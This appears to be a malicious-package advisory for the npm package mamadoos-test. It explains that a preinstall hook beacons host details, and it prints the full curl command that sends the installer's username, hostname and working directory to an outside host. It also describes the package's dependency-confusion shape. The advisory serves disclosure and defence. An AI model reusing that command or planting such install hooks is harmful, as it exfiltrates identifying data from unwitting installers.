MAL-2026-4605

    Dashboard / Malicious Package / MAL-2026-4605

    MAL-2026-4605

    Published: 20 May 2026Last Modified: 1 Sept 2026Aliases: 
    GHSA-qwhw-2wfv-rv3r

    Summary: Malicious code in mamadoos-test (npm)

    Details: Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4) package.json declares a preinstall lifecycle hook that runs `curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd)`, embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on `npm install` with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (`mamadoos-test: ^10.0.0`), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).

    Affected packages

    Package

    Name: mamadoos-test

    Purl: pkg:npm/mamadoos-test

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    10.1.0